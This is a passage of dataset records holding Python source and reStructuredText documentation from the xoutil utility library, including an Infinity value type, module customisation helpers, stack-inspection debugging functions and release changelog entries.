autofunction:: deprecate_linked\n" }, { "alpha_fraction": 0.6017851233482361, "alphanum_fraction": 0.6055612564086914, "avg_line_length": 27.009614944458008, "blob_id": "254346785c829087120698c27128e2a77f6e57ce", "content_id": "23914bf4924ccd70acaf06b8445bb1dd28b222bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2918, "license_type": "no_license", "max_line_length": 88, "num_lines": 104, "path": "/xotl/tools/infinity.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"The Infinity value.\n\nNot all values are comparable with `Infinity`:obj: by default. The ABC\n`InfinityComparable`:class: holds the registry of such values. Any `number\n<numbers.Number>`:class: is comparable with `Infinity`:obj:.\n\n`Dates <datetime.date>`:class:, `datetimes <datetime.datetime>`:class: and\n`time deltas <datetime.timedelta>`:class: are also registered by default.\n\n.. warning:: In Python 2, dates, datetimes and time deltas must be the right\n operand, as in ``Infinity > today``. 
Doing ``today < Infinity``\n fails in Python 2.\n\n\"\"\"\n\nimport abc\nimport datetime\nfrom numbers import Number\nfrom functools import total_ordering\n\n\nclass InfinityComparable(metaclass=abc.ABCMeta):\n \"\"\"Any type that can be sensibly compared to infinity.\n\n All types in the `number <numbers.Number>`:class: tower are *always*\n comparable.\n\n Classes `datetime.date`:class:, `datetime.datetime`:class:, and\n `datetime.timedelta`:class: are automatically registered.\n\n \"\"\"\n\n @classmethod\n def __subclasshook__(self, cls):\n if isinstance(cls, type) and issubclass(cls, Number):\n return True\n else:\n return NotImplemented\n\n\nInfinityComparable.register(datetime.date)\nInfinityComparable.register(datetime.datetime)\nInfinityComparable.register(datetime.timedelta)\n\n\n@total_ordering\nclass InfinityType:\n _positive = None\n _negative = None\n\n def __getnewargs__(self):\n return (self.sign,)\n\n def __new__(cls, sign):\n if sign < 0:\n res = cls._negative\n if not res:\n cls._negative = res = object.__new__(cls)\n else:\n res = cls._positive\n if not res:\n cls._positive = res = object.__new__(cls)\n return res\n\n def __init__(self, sign):\n self.sign = -1 if sign < 0 else 1\n\n def __lt__(self, other):\n if isinstance(other, InfinityComparable):\n return self.sign < 0 # True iff -Infinity\n elif isinstance(other, InfinityType):\n return self.sign < other.sign\n else:\n raise TypeError(\"Incomparable types: %r and %r\" % (type(self), type(other)))\n\n def __eq__(self, other):\n if isinstance(other, InfinityType):\n return self.sign == other.sign\n else:\n return NotImplemented\n\n def __neg__(self):\n return type(self)(-self.sign)\n\n def __str__(self):\n return \"∞\" if self.sign > 0 else \"-∞\"\n\n def __repr__(self):\n return \"Infinity\" if self.sign > 0 else \"-Infinity\"\n\n def __hash__(self):\n return id(self)\n\n\nInfinity = InfinityType(+1)\n" }, { "alpha_fraction": 0.6690455079078674, "alphanum_fraction": 0.6770740151405334, 
"avg_line_length": 22.851064682006836, "blob_id": "4629462fa1e6bb879673213e2a6ef77358af1c7e", "content_id": "25d0f834e6433f68db048c2c637a31192ae9b369", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1121, "license_type": "permissive", "max_line_length": 80, "num_lines": 47, "path": "/docs/source/xotl.tools/decorator.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.decorator`:mod: - Several decorators\n================================================\n\n.. module:: xotl.tools.decorator\n\nThis module contains several useful decorators, for several purposed. Also it\nsevers as a namespace for other well-defined types of decorators.\n\n.. warning:: This modules will be progressively deprecated during the 1.6\n series.\n\n We feel that either `xotl.tools.objects`:mod: or `xotl.tools.functools` are a\n better match for some of these decorators. But since we need to make sure\n about keeping dependencies, the deprecation won't be final until 1.7.0.\n After 1.8.0, this modules will be finally removed.\n\nTop-level decorators\n--------------------\n\n.. autoclass:: AttributeAlias\n :members:\n\n.. autofunction:: settle\n\n.. autofunction:: namer\n\n.. autofunction:: aliases\n\n.. autofunction:: assignment_operator(func, maybe_inline=False)\n\n.. autofunction:: instantiate(target, *args, **kwargs)\n\n.. autofunction:: constant_bagger(func, *args, **kwds)\n\n.. autoclass:: memoized_instancemethod\n\n\n\n\nSub packages\n------------\n\n.. 
toctree::\n :glob:\n :maxdepth: 1\n\n decorator/*\n" }, { "alpha_fraction": 0.7659574747085571, "alphanum_fraction": 0.7659574747085571, "avg_line_length": 46, "blob_id": "adb9b65168e9a53a172c098177357551349fde9d", "content_id": "8eec18ce4456657ddec280fed1ad4743f5a5f249", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 47, "license_type": "permissive", "max_line_length": 46, "num_lines": 1, "path": "/docs/source/history/_changes-2.1.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix packaging issue. No functional changes.\n" }, { "alpha_fraction": 0.6324856281280518, "alphanum_fraction": 0.6357670426368713, "avg_line_length": 28.0238094329834, "blob_id": "6cfef7e0edcde8fd181156c98a583b2da1703cb3", "content_id": "646031ad55ccb872935c892f2eb4886791b0ce98", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1219, "license_type": "permissive", "max_line_length": 78, "num_lines": 42, "path": "/docs/source/xotl.tools/fp/prove.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fp.prove`:mod: - Prove validity of values\n=====================================================\n\nProving success or failure of a function call has two main patterns:\n\n1. Predicative: a function call returns one or more values indicating a\n failure, for example method ``find`` in strings returns ``-1`` if the\n sub-string is not found. In general this pattern considers a set of values\n as logical Boolean true, an other set false.\n\n Example::\n\n index = s.find('x')\n if index >= 0:\n ... # condition of success\n else:\n ... # condition of failure\n\n\n\n2. 
Disruptive: a function call throws an exception on a failure breaking the\n normal flow of execution, for example method ``index`` in strings.\n\n Example::\n\n try:\n index = s.index('x)\n except ValueError:\n ... # condition of failure\n else:\n ... # condition of success\n\n The exception object contains the semantics of the \"\"anomalous condition\".\n Exception handling can be used as flow control structures for execution\n context inter-layer processing, or as a termination condition.\n\n\nModule content\n--------------\n\n.. automodule:: xotl.tools.fp.prove\n :members:\n" }, { "alpha_fraction": 0.5541125535964966, "alphanum_fraction": 0.5541125535964966, "avg_line_length": 37.5, "blob_id": "7149b8f021aeff7ab301ec0e108c5f5202b67928", "content_id": "876ef20b09fca01d5ebbe8cbadcdfb89948b3897", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 231, "license_type": "permissive", "max_line_length": 73, "num_lines": 6, "path": "/docs/source/xotl.tools/fs/path.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fs.path`:mod: -- Path utilities\n===========================================\n\n.. 
automodule:: xotl.tools.fs.path\n :members: join, fix_encoding, normalize_path, shorten_module_filename,\n shorten_user, rtrim\n" }, { "alpha_fraction": 0.7051734328269958, "alphanum_fraction": 0.7104644179344177, "avg_line_length": 35.58064651489258, "blob_id": "35d56dede9ca9da1695ec5bdd1c5b90c1ea4d366", "content_id": "958c2a46087bd1b950cf5c426c4ee9c5d408fba2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3402, "license_type": "permissive", "max_line_length": 78, "num_lines": 93, "path": "/docs/source/history/_changes-1.8.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Remove deprecated `!xoutil.objects.metaclass`:class:, use\n `xoutil.eight.meta.metaclass`:func: instead.\n\n- Several modules are migrated to `xoutil.future`:mod:\\ :\n\n .. hlist::\n :columns: 3\n\n - `~xoutil.future.types`:mod:.\n - `~xoutil.future.collections`:mod:.\n - `~xoutil.future.datetime`:mod:.\n - `~xoutil.future.functools`:mod:.\n - `~xoutil.future.inspect`:mod:.\n - `~xoutil.future.codecs`:mod:.\n - `~xoutil.future.json`:mod:.\n - `~xoutil.future.threading`:mod:.\n - `~xoutil.future.subprocess`:mod:.\n - `~xoutil.future.pprint`:mod:.\n - `~xoutil.future.textwrap`:mod:.\n\n .. note:: All modules remain importable from its future-less version,\n however, deprecated.\n\n- Add function `xoutil.deprecation.import_deprecated`:func:,\n `~xoutil.deprecation.inject_deprecated`:func: can be deprecated now.\n\n- Add function `xoutil.deprecation.deprecate_linked`:func: to deprecate full\n modules imported from a linked version. 
The main example are all\n sub-modules of `xoutil.future`:mod:.\n\n- Add function `xoutil.deprecation.deprecate_module`:func: to deprecate full\n modules when imported.\n\n- The module `xoutil.string`:mod: suffered a major reorganization due to\n ambiguity use of Strings in Python.\n\n- Create ``__crop__`` protocol for small string representations, see\n `xoutil.clipping.crop`:func: for more information.\n\n Because `~xoutil.clipping`:mod: module is still **experimental**, definitive\n names of operator and main function must be validated before it could be\n considered definitive. Proposals are: \"crop\", \"small\", \"short\", \"compact\",\n \"abbr\".\n\n- Remove ``xoutil.connote`` that was introduced provisionally in 1.7.1.\n\n- Module `xoutil.params`:mod: was introduced provisionally in 1.7.1, but now\n has been fully recovered.\n\n - Add function `~xoutil.params.issue_9137`:func: -- Helper to fix issue 9137\n (self ambiguity).\n\n - Add function `~xoutil.params.check_count`:func: -- Checker for positional\n arguments actual count against constrains.\n\n - Add function `~xoutil.params.check_default`:func: -- Default value getter\n when passed as a last excess positional argument.\n\n - Add function `~xoutil.params.single`:func: -- Return true only when a\n unique argument is given.\n\n - Add function ``xoutil.params.keywords_only`` -- Decorator to make a\n function to accepts its keywords arguments as keywords-only.\n\n - Add function `~xoutil.params.pop_keyword_arg`:func: -- Tool to get a value\n from keyword arguments using several possible names.\n\n - Add class `~xoutil.params.ParamManager`:class: -- Parameter manager in a\n \"smart\" way.\n\n - Add class `~xoutil.params.ParamScheme`:class: -- Parameter scheme\n definition for a manager.\n\n - Add class `~xoutil.params.ParamSchemeRow`:class: -- Parameter scheme\n complement.\n\n - Remove ``xoutil.params.ParamConformer``.\n\n- Module `xoutil.values`:mod: was recovered adding several new features (old\n name 
``xoutil.cl`` was deprecated).\n\n- Add **experimental** module `xoutil.fp`:mod: for Functional Programming\n stuffs.\n\n- Add **experimental** module `xoutil.tasking`:mod:.\n\n- Add `xoutil.symbols`:mod:. It replaces `!xoutil.logical`:mod: that was\n introduced in 1.7.0, but never documented.\n\n- Remove deprecated module ``xoutil.data``. Add\n `xoutil.objects.adapt_exception`:func:.\n\n- Remove deprecated `xoutil.dim.meta.Signature.isunit`:meth:.\n" }, { "alpha_fraction": 0.7678571343421936, "alphanum_fraction": 0.7678571343421936, "avg_line_length": 55, "blob_id": "4b96ebca03a3ef0e5610eb7437c19079067fc08d", "content_id": "9b3e97ac486c2400fa7c101dae5ef2aa5d963edb", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 56, "license_type": "permissive", "max_line_length": 55, "num_lines": 1, "path": "/docs/source/history/_changes-1.7.12.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- `xoutil.datetime.EmptyTimeSpan`:obj: is now pickable.\n" }, { "alpha_fraction": 0.7234042286872864, "alphanum_fraction": 0.7234042286872864, "avg_line_length": 30.33333396911621, "blob_id": "0c8ec1d5c1c2da537660606b972b8c74c9a6229d", "content_id": "5f243fc3cf47bc2a39ddabe39d6a8c0767a2245c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 94, "license_type": "permissive", "max_line_length": 52, "num_lines": 3, "path": "/docs/source/history/_changes-1.7.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add `xoutil.iterators.ungroup`:func:.\n\n- Add `xoutil.future.datetime.get_next_month`:func:.\n" }, { "alpha_fraction": 0.6976743936538696, "alphanum_fraction": 0.7162790894508362, "avg_line_length": 34.83333206176758, "blob_id": 
"dc560703949a035f5acfc4453986af90351c617e", "content_id": "dcacdef95d042dbb9b83eba7cc24d3875ec707c2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 215, "license_type": "permissive", "max_line_length": 69, "num_lines": 6, "path": "/docs/source/history/_changes-1.9.9.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug `#4`_: `xoutil.decorator.meta.flat_decorator`:func: was not\n working in Python 3.\n\n- Deprecate `xoutil.decorator.meta.flat_decorator`:func:.\n\n.. _#4: https://gitlab.merchise.org/merchise/xoutil/issues/4\n" }, { "alpha_fraction": 0.6065720319747925, "alphanum_fraction": 0.6082342267036438, "avg_line_length": 31.31818199157715, "blob_id": "6f253f857a4d2d58d13ce89718b5c5f0706f54b5", "content_id": "9517a5d7491aeb92205c394be3ad025663624c07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7822, "license_type": "no_license", "max_line_length": 79, "num_lines": 242, "path": "/xotl/tools/modules.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Modules utilities.\"\"\"\n\nfrom types import ModuleType\n\n# TODO: Implement the concept of module descriptor\n\n\ndef force_module(ref=None):\n \"\"\"Load a module from a string or return module if already created.\n\n If `ref` is not specified (or integer) calling module is assumed looking\n in the stack.\n\n .. 
note:: Implementation detail\n\n Function used to inspect the stack is not guaranteed to exist in all\n implementations of Python.\n\n \"\"\"\n from importlib import import_module\n\n if isinstance(ref, ModuleType):\n return ref\n else:\n if ref is None:\n ref = 1\n if isinstance(ref, int):\n import sys\n\n frame = sys._getframe(ref)\n try:\n ref = frame.f_globals[\"__name__\"]\n finally:\n # As recommended to avoid memory leaks\n del frame\n if not isinstance(ref, str):\n if isinstance(ref, bytes):\n ref = ref.decode() # Python 3.x\n else:\n try:\n ref = ref.encode() # Python 2.x\n except Exception: # TODO: @med which exceptions expected?\n msg = \"invalid type '{}' for module name '{}'\"\n raise TypeError(msg.format(type(ref).__name__, ref))\n return import_module(ref)\n\n\n# TODO: Deprecate this method in favor of ``from <module> import *``\ndef copy_members(source=None, target=None):\n \"\"\"Copy module members from `source` to `target`.\n\n It's common in `xotl.tools` package to extend Python modules with the same\n name, for example `xotl.tools.datetime` has all public members of Python's\n `datetime`. `copy_members`:func: can be used to copy all members from the\n original module to the extended one.\n\n :param source: string with source module name or module itself.\n\n If not given, is assumed as the last module part name of `target`.\n\n :param target: string with target module name or module itself.\n\n If not given, target name is looked in the stack of caller module.\n\n :returns: Source module.\n :rtype: `ModuleType`\n\n .. 
warning:: Implementation detail\n\n Function used to inspect the stack is not guaranteed to exist in all\n implementations of Python.\n\n \"\"\"\n target = force_module(target or 2)\n if source is None:\n source = target.__name__.rsplit(\".\")[-1]\n if source == target.__name__:\n msg = '\"source\" and \"target\" modules must be different.'\n raise ValueError(msg)\n source = force_module(source)\n for attr in dir(source):\n if not attr.startswith(\"__\"):\n setattr(target, attr, getattr(source, attr))\n return source\n\n\nclass _CustomModuleBase(ModuleType):\n pass\n\n\ndef customize(module, custom_attrs=None, meta=None):\n \"\"\"Replaces a `module` by a custom one.\n\n Injects all kwargs into the newly created module's class. This allows to\n have module into which we may have properties or other type of\n descriptors.\n\n :param module: The module object to customize.\n\n :param custom_attrs: A dictionary of custom attributes that should be\n injected in the customized module.\n\n .. versionadded:: 1.4.2 Changes the API, no longer uses the\n ``**kwargs`` idiom for custom attributes.\n\n :param meta: The metaclass of the module type. This should be a subclass\n of `type`. 
We will actually subclass this metaclass to\n properly inject `custom_attrs` in our own internal\n metaclass.\n\n :returns: A tuple of ``(module, customized, class)`` with the module in\n the first place, `customized` will be True only if the module\n was created (i.e `customize`:func: is idempotent), and the\n third item will be the class of the module (the first item).\n\n \"\"\"\n if not isinstance(module, _CustomModuleBase):\n import sys\n\n meta_base = meta if meta else type\n\n class CustomModuleType(meta_base):\n def __new__(cls, name, bases, attrs):\n if custom_attrs:\n attrs.update(custom_attrs)\n return super().__new__(cls, name, bases, attrs)\n\n class CustomModule(_CustomModuleBase, metaclass=CustomModuleType):\n def __getattr__(self, attr):\n self.__dict__[attr] = result = getattr(module, attr)\n return result\n\n def __dir__(self):\n res = set(dir(module))\n if custom_attrs:\n res |= set(custom_attrs.keys())\n return list(res)\n\n sys.modules[module.__name__] = result = CustomModule(module.__name__)\n return result, True, CustomModule\n else:\n return module, False, type(module)\n\n\ndef modulemethod(func):\n \"\"\"Decorator that defines a module-level method.\n\n Simply a module-level method, will always receive a first argument `self`\n with the module object.\n\n \"\"\"\n import sys\n from functools import wraps\n\n self, _created, cls = customize(sys.modules[func.__module__])\n\n @wraps(func)\n def inner(*args, **kwargs):\n return func(self, *args, **kwargs)\n\n setattr(cls, func.__name__, func)\n return inner\n\n\ndef moduleproperty(getter, setter=None, deleter=None, doc=None, base=property):\n \"\"\"Decorator that creates a module-level property.\n\n The module of the `getter` is replaced by a custom implementation of the\n module, and the property is injected to the custom module's class.\n\n The parameter `base` serves the purpose of changing the base for the\n property. 
For instance, this allows you to have `memoized_properties\n <xotl.tools.objects.memoized_property>`:func: at the module-level::\n\n def memoized(self):\n return self\n memoized = moduleproperty(memoized, base=memoized_property)\n\n\n .. versionadded:: 1.6.1 Added the `base` parameter.\n\n \"\"\"\n import sys\n\n module = sys.modules[getter.__module__]\n module, _created, cls = customize(module)\n\n class prop(base):\n if getattr(base, \"setter\", False):\n\n def setter(self, func, _name=None):\n result = super().setter(func)\n setattr(cls, _name or func.__name__, result)\n return result\n\n if getattr(base, \"deleter\", False):\n\n def deleter(self, func, _name=None):\n result = super().deleter(func)\n setattr(cls, _name or func.__name__, result)\n return result\n\n result = prop(getter, doc=doc)\n name = getter.__name__\n setattr(cls, getter.__name__, result)\n if setter:\n result = result.setter(setter, _name=name)\n if deleter:\n result = result.deleter(deleter, _name=name)\n return result\n\n\ndef get_module_path(module):\n \"\"\"Gets the absolute path of a `module`.\n\n :param module: Either module object or a (dotted) string for the module.\n\n :returns: The path of the module.\n\n If the module is a package, returns the directory path (not the path to the\n ``__init__``).\n\n If `module` is a string and it's not absolute, raises a TypeError.\n\n \"\"\"\n from importlib import import_module\n from xotl.tools.fs.path import normalize_path\n\n mod = import_module(module) if isinstance(module, str) else module\n # The __path__ only exists for packages and does not include the\n # __init__.py\n path = mod.__path__[0] if hasattr(mod, \"__path__\") else mod.__file__\n return normalize_path(path)\n" }, { "alpha_fraction": 0.5047169923782349, "alphanum_fraction": 0.5047169923782349, "avg_line_length": 41.400001525878906, "blob_id": "929662cf38b9dd1cc7a1306bd2a6bc86cfc543a6", "content_id": "b83471dc2207cb9f430e660a67b0f7c4c201e41e", "detected_licenses": [ 
"Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 212, "license_type": "permissive", "max_line_length": 73, "num_lines": 5, "path": "/docs/source/xotl.tools/validators/identifiers.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.validators.identifiers`:mod: -- Simple identifiers validators\n=========================================================================\n\n.. automodule:: xotl.tools.validators.identifiers\n :members:\n" }, { "alpha_fraction": 0.5781487226486206, "alphanum_fraction": 0.5781487226486206, "avg_line_length": 31.950000762939453, "blob_id": "f881d4110853e30e9d427e06c756b1b4ca3f6c70", "content_id": "e1558a13752bab6a531ba7f4b9ce44bcfb62aee2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 659, "license_type": "permissive", "max_line_length": 77, "num_lines": 20, "path": "/docs/source/xotl.tools/dim.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=====================================================================\n `xotl.tools.dim`:mod: - Facilities to work with `concrete numbers`_\n=====================================================================\n\n.. module:: xotl.tools.dim\n\nThe name 'dim' is a short of dimension. We borrow it from the topic\n`dimensional analysis`_, even though the scope of this module is less\nambitious.\n\nThis module is divided in two major parts: meta-definitions and applications.\n\n.. toctree::\n :glob:\n\n dim/meta\n dim/*\n\n.. _concrete numbers: https://en.wikipedia.org/wiki/Concrete_number\n.. 
_dimensional analysis: https://en.wikipedia.org/wiki/Dimensional_analysis\n" }, { "alpha_fraction": 0.6943231225013733, "alphanum_fraction": 0.7248908281326294, "avg_line_length": 37.16666793823242, "blob_id": "691d33db4fdaa6ac093f76ac931d12779904b106", "content_id": "c77d17ed2bf4a3013d84a136125887cc1c941d7b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 229, "license_type": "permissive", "max_line_length": 78, "num_lines": 6, "path": "/docs/source/history/_changes-2.0.4.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Packaging fix: the python tag for releases in the 2.0 branch was incorrectly\n set to \"py2\". xoutil 2.0+ support only Python 3.4+.\n\n We're removing the wrongly tagged releases from PyPI__.\n\n__ https://pypi.org/project/xoutil\n" }, { "alpha_fraction": 0.5462241768836975, "alphanum_fraction": 0.5528841018676758, "avg_line_length": 27.30351448059082, "blob_id": "fb1233933dcdfcde563d9538d133db1734728cca", "content_id": "3b5f80032f170ef3a596868e6315c882e77d7289", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8860, "license_type": "no_license", "max_line_length": 78, "num_lines": 313, "path": "/xotl/tools/cpystack.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Utilities to inspect the CPython's stack.\"\"\"\n\nimport inspect\nfrom xotl.tools.deprecation import deprecated\n\n\n__all__ = (\n \"MAX_DEEP\",\n \"getargvalues\",\n \"error_info\",\n \"object_info_finder\",\n \"object_finder\",\n 
\"track_value\",\n \"iter_stack\",\n \"iter_frames\",\n)\n\nMAX_DEEP = 25\n\n\ndef getargvalues(frame):\n \"\"\"Inspects the given frame for arguments and returns a dictionary that\n maps parameters names to arguments values. If an `*` argument was passed\n then the key on the returning dictionary would be formatted as\n `<name-of-*-param>[index]`.\n\n For example in the function::\n\n >>> def autocontained(a, limit, *margs, **ks):\n ... import sys\n ... return getargvalues(sys._getframe())\n\n >>> autocontained(1, 12)['limit']\n 12\n\n >>> autocontained(1, 2, -10, -11)['margs[0]']\n -10\n\n \"\"\"\n from xotl.tools.values.simple import force_sequence_coerce as array\n from xotl.tools.future.itertools import flatten\n\n pos, args, kwds, values = inspect.getargvalues(frame)\n res = {}\n for keys in pos:\n if keys:\n res.update({key: values[key] for key in flatten(array(keys))})\n if args:\n i = 0\n for item in values[args]:\n res[\"%s[%s]\" % (args, i)] = item\n i += 1\n if kwds:\n res.update(values[kwds])\n return res\n\n\ndef __error_info(tb, *args, **kwargs):\n \"\"\"Internal function used by `error_info`:func: and\n `printable_error_info`:func:.\n\n \"\"\"\n # TODO: Formalize tests for this\n ALL = True\n res = []\n kwargs.update(dict.fromkeys(args, ALL))\n if kwargs:\n deep = 0\n processed = set()\n while tb and (deep < MAX_DEEP):\n frame = tb.tb_frame\n func_name = frame.f_code.co_name\n attrs1 = kwargs.get(func_name, None)\n attrs2 = kwargs.get(deep, None)\n if attrs1 or attrs2:\n processed.add(func_name)\n processed.add(deep)\n if (attrs1 is ALL) or (attrs2 is ALL):\n attrs = ALL\n else:\n attrs = list(attrs1) if attrs1 else []\n if attrs2:\n attrs.extend(attrs2)\n if attrs is ALL:\n item = frame.f_locals.copy()\n else:\n item = {key: frame.f_locals.get(key) for key in attrs}\n item[\"function-name\"] = func_name\n item[\"traceback-deep\"] = deep\n item[\"line-number\"] = tb.tb_lineno\n item[\"file-name\"] = frame.f_code.co_filename\n res.append(item)\n tb = 
tb.tb_next\n deep += 1\n for item in processed:\n if item in kwargs:\n del kwargs[item]\n if kwargs:\n res[\"unprocessed-items\"] = kwargs\n return res\n\n\ndef error_info(*args, **kwargs):\n \"\"\"Get error information in current trace-back.\n\n No all trace-back are returned, to select which are returned use:\n\n - ``args``: Positional parameters\n\n - If string, represent the name of a function.\n\n - If an integer, a trace-back level.\n\n Return all values.\n\n - ``kwargs``: The same as ``args`` but each value is a list of local\n names to return. If a value is ``True``, means all local variables.\n\n Return a list with a dict in each item.\n\n Example::\n\n >>> def foo(x):\n ... x += 1//x\n ... if x % 2:\n ... bar(x - 1)\n ... else:\n ... bar(x - 2)\n\n >>> def bar(x):\n ... x -= 1//x\n ... if x % 2:\n ... foo(x//2)\n ... else:\n ... foo(x//3)\n\n >>> try: # doctest: +SKIP\n ... foo(20)\n ... except:\n ... print(printable_error_info('Example', foo=['x'], bar=['x']))\n Example\n ERROR: integer division or modulo by zero\n ...\n\n \"\"\"\n import sys\n\n _error_type, _error, tb = sys.exc_info()\n return __error_info(tb, *args, **kwargs)\n\n\ndef printable_error_info(base, *args, **kwargs):\n \"\"\"Get error information in current trace-back.\n\n No all trace-back are returned, to select which are returned use:\n\n - ``args``: Positional parameters\n\n - If string, represent the name of a function.\n\n - If an integer, a trace-back level.\n\n Return all values.\n\n - ``kwargs``: The same as ``args`` but each value is a list of local\n names to return. 
If a value is ``True``, means all local variables.\n\n Return a formatted string with all information.\n\n See `error_info`:func: for an example.\n\n \"\"\"\n import sys\n\n _error_type, error, tb = sys.exc_info()\n if tb:\n res = \"%s\\n\\tERROR: %s\\n\\t\" % (base, error)\n info = __error_info(tb, *args, **kwargs)\n return res + \"\\n\\t\".join(str(item) for item in info)\n else:\n return \"\"\n\n\ndef object_info_finder(obj_type, arg_name=None, max_deep=MAX_DEEP):\n \"\"\"Find an object of the given type through all arguments in stack frames.\n\n Returns a tuple with the following values:\n (arg-value, arg-name, deep, frame).\n\n When no object is found\n None is returned.\n\n Arguments:\n object_type: a type or a tuple of types as in \"isinstance\".\n arg_name: the arg_name to find; if None find in all arguments\n max_deep: the max deep to enter in the stack frames.\n\n \"\"\"\n frame = inspect.currentframe()\n try:\n deep = 0\n res = None\n while (res is None) and (deep < max_deep) and (frame is not None):\n ctx = getargvalues(frame)\n d = {arg_name: ctx.get(arg_name)} if arg_name is not None else ctx\n for key in d:\n value = d[key]\n if isinstance(value, obj_type):\n res = (value, key, deep, frame)\n frame = frame.f_back\n deep += 1\n return res\n finally:\n del frame # As recommended in the Python's doc to avoid memory leaks\n\n\ndef object_finder(obj_type, arg_name=None, max_deep=MAX_DEEP):\n \"\"\"Find an object of the given type through all arguments in stack frames.\n\n The difference with `object_info_finder`:func: is that this function\n returns the object directly, not a tuple.\n\n \"\"\"\n finder = object_info_finder(obj_type, arg_name, max_deep)\n info = finder()\n return info[0] if info else None\n\n\ndef track_value(value, max_deep=MAX_DEEP):\n \"\"\"Find a value through all arguments in stack frames.\n\n Returns a dictionary with the full-context in the same level as \"value\".\n\n \"\"\"\n frame = inspect.currentframe().f_back.f_back\n deep = 
0\n res = None\n while (res is None) and (deep < max_deep) and (frame is not None):\n ctx = getargvalues(frame)\n for _key in ctx:\n _value = ctx[_key]\n if (type(value) == type(_value)) and (value == _value):\n res = (ctx, _key)\n frame = frame.f_back\n deep += 1\n return res\n\n\ndef iter_stack(max_deep=MAX_DEEP):\n \"\"\"Iterates through stack frames until exhausted or `max_deep` is reached.\n\n To find a frame fulfilling a condition use::\n\n frame = next(f for f in iter_stack() if condition(f))\n\n .. versionadded:: 1.6.8\n\n \"\"\"\n # Using the previous pattern, functions `object_info_finder`,\n # `object_finder` and `track_value` can be reprogrammed or deprecated.\n\n frame = inspect.currentframe()\n try:\n deep = 0\n while (deep < max_deep) and (frame is not None):\n yield frame\n frame = frame.f_back\n deep += 1\n finally:\n del frame # As recommended in the Python's doc to avoid memory leaks\n\n\n@deprecated(iter_stack)\ndef iter_frames(max_deep=MAX_DEEP):\n \"\"\"Iterates through all stack frames.\n\n Returns tuples with the following::\n\n (deep, filename, line_no, start_line).\n\n .. versionadded:: 1.1.3\n\n .. 
